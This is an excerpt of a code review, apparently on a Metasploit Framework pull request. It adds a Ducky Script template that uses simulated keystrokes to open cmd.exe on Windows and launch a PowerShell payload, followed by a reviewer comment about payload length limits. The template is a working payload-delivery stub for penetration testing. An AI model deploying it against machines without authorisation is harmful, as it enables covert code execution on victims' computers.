data/templates/scripts/to_powershell.ducky_script.template

```diff
@@ -0,0 +1,15 @@
+REM Title: Metasploit Generated Payload
+REM Description: Opens a payload via powershell on the system
+REM Target: Windows 10/11 (Powershell)
+REM Version: 1.0
+REM Open start menu
+REM We use cmd.exe since the powershell payload is likely too long for the run bar
+GUI r
+DELAY 750
+STRING cmd.exe
+DELAY 750
+ENTER
+DELAY 750
+STRING powershell.exe %{var_payload}
```

Comment:
I was about to leave a placeholder comment to test this against large payloads since there's a limit to the payload size here iirc, but looks like Spencer's tested that already 🎉 

> If the payload is too large it throws an error saying it won't fit in the Powershell command length which makes sense in this context.
> https://github.com/rapid7/metasploit-framework/pull/17279#pullrequestreview-1190637168